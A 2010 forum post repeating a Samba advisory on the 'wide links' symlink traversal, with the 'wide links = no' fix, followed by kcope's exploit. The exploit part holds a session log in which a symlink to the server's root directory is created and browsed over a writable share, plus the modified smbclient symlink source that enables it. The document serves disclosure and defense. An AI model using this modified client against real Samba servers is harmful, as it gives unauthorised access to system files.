Jump to content
pyth0n3

Claimed Zero Day exploit in Samba

By pyth0n3, in Stiri securitate

Recommended Posts

pyth0n3 Newbie

pyth0n3

Posted
Posted

5 February 2010

A user named "kcopedarookie" posted what they claim to be a video of a zero-day exploit in Samba on youtube yesterday.

The video shows modifications to smbclient allowing /etc/passwd to be downloaded from a remote server.

The issue is actually a default insecure configuration in Samba.

Quick FAQ: What do I do !

Set:

wide links = no

in the [global] section of your smb.conf and restart smbd to eliminate this problem.

Longer FAQ: The real issue

The problem comes from a combination of two features in Samba, each of which on their own are useful to Administrators, but in combination allow users to access any file on the system that their logged in username has permissions to read (this is not a privilege escalation problem).

By default Samba ships with the parameter "wide links = yes", which allows Administrators to locally (on the server) add a symbolic link inside an exported share which SMB/CIFS clients will follow.

As an example, given a share definition:

[tmp]

path = /tmp

read only = no

guest ok = yes

The administrator could add a symlink:

$ ln -s /etc/passwd /tmp/passwd

and SMB/CIFS clients would then see a file called "passwd" within the [tmp] share that could be read and would allow clients to read /etc/passwd.

If the "wide links" parameter is set to "no", any attempt to read this file will fail with an "access denied" error.

The problem occurs as Samba allows clients using the UNIX extensions (which are also turned on by default) to create symlinks on remotely mounted shares on which they have write access that point to any path on the file system.

This is by design, as applications running on UNIX clients may have good reasons to create symlinks anywhere on the filesystem they have write access that point to local files (such as /etc/passwd).

UNIX clients will resolve these links locally, but Windows clients will resolve them on the server. It is this combination that causes the problem.

All future versions of Samba will have the parameter "wide links" set to "no" by default, and the manual pages will be updated to explain this issue.

samba.org

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

root () nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb 
//<host>/testmount/
Enter smb's password: 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
  .                                   D        0  Wed Feb  3 14:27:03 2010
  ..                                  D        0  Wed Feb  3 14:19:13 2010
  test                                D        0  Wed Feb  3 14:19:13 2010
  xxx                                 A     1955  Wed Feb  3 14:22:42 2010

                45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
  .                                   D        0  Wed Feb  3 14:27:47 2010
  ..                                  D        0  Wed Feb  3 14:19:13 2010
  xxx                                 A     1955  Wed Feb  3 14:22:42 2010
  foobar                              D        0  Mon Feb  1 20:29:12 2010

                45503 blocks of size 2097152. 24437 blocks available
smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..

                45503 blocks of size 2097152. 24437 blocks available
smb: \> cd foobar
smb: \foobar\> ls
  .                                   D        0  Mon Feb  1 20:29:12 2010
  ..                                  D        0  Mon Feb  1 20:29:12 2010
  initrd.img.old                         7646184  Mon Jan 18 13:15:48 2010
  boot.ini                                 18832  Mon Feb  1 20:29:12 2010
  home                                D        0  Mon Jan 18 13:08:24 2010
  initrd.img                             8007195  Thu Jan 21 21:51:26 2010
  .cache                             DH        0  Sat Jan 23 14:19:08 2010
  opt                                 D        0  Sat Jan 30 11:39:59 2010
  lib                                 D        0  Thu Jan 21 21:13:01 2010
  usr                                 D        0  Sun Jan 31 22:08:11 2010
  .libs                              DH        0  Thu Jan 21 12:30:48 2010
  var                                 D        0  Sun Jan 31 21:14:42 2010
  bin                                 D        0  Mon Jan 18 13:31:14 2010
  selinux                             D        0  Tue Oct 20 01:05:22 2009
  root                                D        0  Tue Feb  2 19:43:59 2010
  vmlinuz.old                            3890400  Fri Oct 16 20:03:49 2009
  vmlinuz                                3890560  Thu Dec 10 20:33:26 2009
  etc                                 D        0  Wed Feb  3 14:17:29 2010
  srv                                 D        0  Sat Jan 23 20:17:29 2010
  proc                               DR        0  Wed Feb  3 14:10:41 2010
  dev                                 D        0  Wed Feb  3 14:11:02 2010
  boot                                D        0  Thu Jan 21 21:51:26 2010
  mnt                                 D        0  Sat Jan 23 19:26:23 2010
  media                               D        0  Fri Jan 29 08:32:31 2010
  cdrom                               D        0  Mon Jan 18 12:40:11 2010
  tmp                                 D        0  Wed Feb  3 14:26:20 2010
  sbin                                D        0  Thu Jan 21 21:50:58 2010
  lost+found                          D        0  Mon Jan 18 12:39:57 2010
  sys                                 D        0  Wed Feb  3 14:10:41 2010

                45503 blocks of size 2097152. 24437 blocks available
smb: \foobar\> 

put and get works in the folder now!

list open shares, this is normal operation mode not an exploit:

root () nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L 
//<host>/
Enter root's password: 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

        Sharename       Type      Comment
        ---------       ----      -------
        testmount       Disk                                                            // < this share is writable and 
exploitable!!
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

        Server               Comment
        ---------            -------
        NR-PENTEST           nr-pentest server (Samba, Ubuntu)

        Workgroup            Master
        ---------            -------
        WORKGROUP            NR-PENTEST


smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
 UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
        TALLOC_CTX *ctx = talloc_tos();
        char *oldname = NULL;
        char *newname = NULL;
        char *buf = NULL;
        char *buf2 = NULL;
        char *targetname = NULL;
        struct cli_state *targetcli;

        if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
            !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
                d_printf("symlink <oldname> <newname>\n");
                return 1;
        }
        oldname = talloc_asprintf(ctx,                  
                        "%s",                           // << HERE modified
                        buf);                           
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s",                           // << HERE modified
                        buf2);
        if (!newname) {
                return 1;
        }
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
      oldname = talloc_asprintf(ctx,
                        "%s%s",                         // < modified (see above)
                        client_get_cur_dir(),           // < removed (see above)
                        buf);
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s%s",                         // < modified (see above)
                        client_get_cur_dir(),           // < removed (see above)
                        buf2);
        if (!newname) {
                return 1;
        }
----------------------------------------------*/

        if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
                d_printf("link %s: %s\n", oldname, cli_errstr(cli));
                return 1;

        }

        if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
                d_printf("Server doesn't support UNIX CIFS calls.\n");
                return 1;
        }

        if (!cli_unix_symlink(targetcli, targetname, newname)) {
                d_printf("%s symlinking files (%s -> %s)\n",
                        cli_errstr(targetcli), newname, targetname);
                return 1;
        }

        return 0;
}


// Cheers,
// kcope


Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...